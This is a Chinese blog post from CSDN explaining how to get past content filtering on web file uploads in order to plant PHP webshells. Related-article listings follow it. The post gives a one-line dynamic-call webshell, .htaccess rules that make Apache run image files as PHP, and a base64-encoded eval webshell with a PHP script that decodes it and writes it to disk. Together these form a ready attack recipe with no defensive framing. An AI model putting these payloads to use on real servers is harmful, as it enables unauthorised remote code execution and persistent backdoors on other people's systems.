shell文件上传—危险函数(内容)检测绕过

最新推荐文章于 2024-05-02 20:40:27 发布
最新推荐文章于 2024-05-02 20:40:27 发布
阅读量615 收藏
点赞数 1
文章标签: php apache 网络安全 web安全 学习方法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56228347/article/details/128034202
版权

shell文件上传—危险函数(内容)检测绕过


    文件上传点有时候除了对文件后缀进行检测外,还会对文件内容进行检测,涉及到危险函数或者木马的内容都会进行删除,可以尝试使用以下方法来绕过:

(1)使用动态调用绕过,例如:

<?php $_GET['0']($_GET['1']);?>
此方法不能绕过disable_function

(2)上传编码后的webshell配合.htaccess来解析
    注意点:.htaccess只适用apache ①、Allow Override All ②、LoadModule rewrite_module modules/mod_rewrite.so #rewrite模块为开启状态。

AddType application/x-httpd-php .jpg
第一种:将所有后缀为.jpg的文件作为php文件解析
<FilesMatch "BaiZe">
setHandler application/x-httpd-phpBZ
</FilesMatch>  
第二种:将所有文件名包含BaiZe的文件作为php文件解析

(3)上传编码后的webshell,再另外上传一个脚本文件解码webshell并写入新文件,例如下面这段代码为1.php:

PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7Pz4=     //经过base64加密

上传后再上传下面为2.php,然后访问后再访问test.php即可getshell

<?php 

$path ="/xx/xxx/xx/1.php";

$str= file_get_contents($path);        //获取1.php文件的内容

$strs = base64_decode($str);           //将内容进行base64解密

$test = fopen("./test.php","w");       //新建一个文件为test.php

fwrite($test,$strs);                   //将解密后的内容写入test.php文件中
fclose($test);
?>
网工沉破鱼
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
shell脚本实现实时检测文件变更
09-15
主要介绍了shell脚本实现实时检测文件变更,本文直接给出实现代码和使用方法,以及svn下的实现代码,需要的朋友可以参考下
网络安全文件上传 + 一句话木马原理 + 菜刀的简单使用
热门推荐
垃圾管理员的垃圾站
09-01 1万+
很多的网站提供了文件上传功能,虽然提供了方便的服务,但稍有疏忽,就可能酿成大祸。 这里的疏忽是指,不对用户上传的内容进行检查。 仍旧以DVWA为例: 网站的本意是接受用户的图片(image),但后台代码却并没有对文件进行检测: 网页源码(部分截图): php处理源码: 文本也贴出来: File Upload Source vulner...
一次不完整的渗透
Mccc_li的博客
11-07 509
渗透测试
php审计--任意文件上传配合目录文件包含getshell
qq_29437513的博客
08-10 446
在黑盒中 源码 数据库配置文件都是很不好找的,,但源码审计不同 所有的漏洞,成因都是相同的,但我们自以最基础的作为代表, 这里文件上传这个点可以配合文件包含一块利用,当某个站对数据处理不严时,存在sql注入,那也可能会有文件注入, 常见的文件目录穿越配合文件包含实现getshell 演示目录穿越的原理,这里通过readfile函数读取文件,注意file变量里有个正斜杆 <?php if(isset($_GET['file'])){ readfile("file/".$_GET['file'])
文件上传漏洞——服务器检测绕过2
weixin_54055099的博客
09-22 1092
文件上传漏洞之服务器检测绕过
PHP操作用户提交内容时需要注意的危险函数
硬核项目经理
06-04 109
PHP操作用户提交内容时需要注意的危险函数对于我们的程序开发来说,用户的输入是解决安全性问题的第一大入口。为什么这么说呢?不管是SQL注入、XSS还是文件上传漏洞,全部都和用户提交的输入...
i春秋:警惕您站上的文件内容检测绕过类上传漏洞
MyBack
06-01 4001
实验环境 实验环境 操作机:Windows XP 目标机:Windows 2003 目标网址:www.test.com实验工具:中国菜刀 BurpSuite 实验目的 本课程带领大家学习利用修改文件内容绕过上传验证,获取WebShell。通过亲身实验,验证绕过上传验证的可行性,从而提高自身的安全防御意识。 实验思路 上传正常图片和一句
php命令执行绕过,[投稿]Webshell下命令执行限制及绕过方法
weixin_30270715的博客
03-17 832
0x00前言上传webshell后,执行命令时或许没法执行了,这时我们该分析下原理并想出绕过方式,防守方也必须根据绕过方式想想更强的防御.0x01 php webshell执行命令原理php webshell(以下简称webshell)下是怎么执行系统命令的?我们找一个webshell分析下搜索关键字定位到以下代码Defaultfunction execute($cfe) {$res = '';i...
php伪协议绕过限制写shell
weixin_44304686的博客
06-12 2150
原文链接:https://mochazz.github.io/2019/01/14/php伪协议绕过限制写shell/ 这是在 code-breaking 中遇到的一道题目,名为:easy - phpmagic。题目地址:http://51.158.75.42:8082 整个代码逻辑很简单,需要关注的点就两个。一个是 第17-18行 处存在命令字符串格式化,而这里的格式化变量 domain∗∗经...
shell脚本实现linux系统文件完整性检测
09-15
主要介绍了shell脚本实现linux系统文件完整性检测,本文给出的脚本使用对比MD5的方法,检测linux系统文件是否被替换等问题,需要的朋友可以参考下
Shell脚本实现批量替换文件内容
09-15
主要介绍了Shell脚本实现批量替换文件内容,本文主要实现批量修改一个备份脚本里的备份路径,其它批量替换也可以修改使用,需要的朋友可以参考下
Shell脚本实现检测文件是否被修改过代码分享
09-15
主要介绍了Shell脚本实现的检测文件是否被修改代码分享,其实了解了原理就可以做很多事了,需要的朋友可以参考下
Linux shell查找文件显示行号和对应区间的内容
09-15
今天小编就为大家分享一篇关于Linux shell查找文件显示行号和对应区间的内容,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
上传php shell,【转载】phpweb成品网站最新版(注入、上传、写shell)
weixin_34684705的博客
03-11 139
该楼层疑似违规已被系统折叠隐藏此楼查看此楼if (@is_uploaded_file($tmp_name) === false) {alert("临时文件可能不是上传文件。"); }//检查文件大小if ($file_size > $max_size) {alert("上传文件大小超过限制。"); }//获得文件扩展名$temp_arr = ex...
Bugku WEB file_get_contents
qq_41696858的博客
07-17 1118
file_get_contents绕过: 解法1:?ac=bugku&fn=flag.txt 由于flag.txt里面内容就是bugku,当然可以绕过,当然,这属于投机取巧,不具有一般性 解法2:?ac=bugku&fn=php://input 在burp抓到数据包里的数据部分写上bugku,利用php://input伪协议进行绕过 解法3:?ac=bugku&fn=data://text/plain,bugku 利用data://text/plain伪协议进行绕过 data伪协议只
php危险函数文章总结(一)
qq975353472的博客
11-14 191
php危险函数文章总结(一) 因为被分配的任务是总结文章,所以就对一篇文章深深的研究了一下,以下基本都是对该下的文章的总结。 原文在这里 in_array() in_array :(PHP 4, PHP 5, PHP 7) 功能 :检查数组中是否存在某个值 定义 : bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] ) 在 $haystack 中搜索 $needle ,如果第三个参数 $strict 的值为 T
PHP文件上传 getshell 练习,upload_labs 过关笔记(持续更新)
无聊的曹操的博客
05-07 1377
今天断断续续做了下 github 上面的一个文件上传实验,有些关卡是通杀的,感觉我的思路没顺着作者的本意走 项目源地址:https://github.com/c0ny1/upload-labs 贴下过关记录 Pass-01: 00截断 Pass-02: MIME 类型替换 Pass-03: 其他后缀 ...
php利用阿里云短信SDK实现短信发送功能
最新发布
赛时科技
05-02 1037
在阿里云控制台的AccessKey管理中,创建或查看AccessKey ID和AccessKey Secret,这是用于API调用的身份凭证。用户在前端接收到短信验证码后,需要在你的系统中进行验证。在实际部署之前,确保在测试环境中充分测试你的短信验证码登录功能。首先,你需要有一个阿里云账号,并在阿里云控制台中开通短信服务(Dysmsapi)。你可以使用Composer来安装阿里云短信服务的PHP SDK。在PHP中,你需要编写一个函数来调用阿里云短信服务API发送短信验证码。
编写shell脚本文件常用函数
05-20
shell脚本文件中,常用的函数有: 1. echo:输出信息到终端; 2. read:从终端读入用户输入的值; 3. test:用于测试条件是否成立,常用于if语句中; 4. if-else语句:用于判断条件是否成立,根据结果执行相应的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值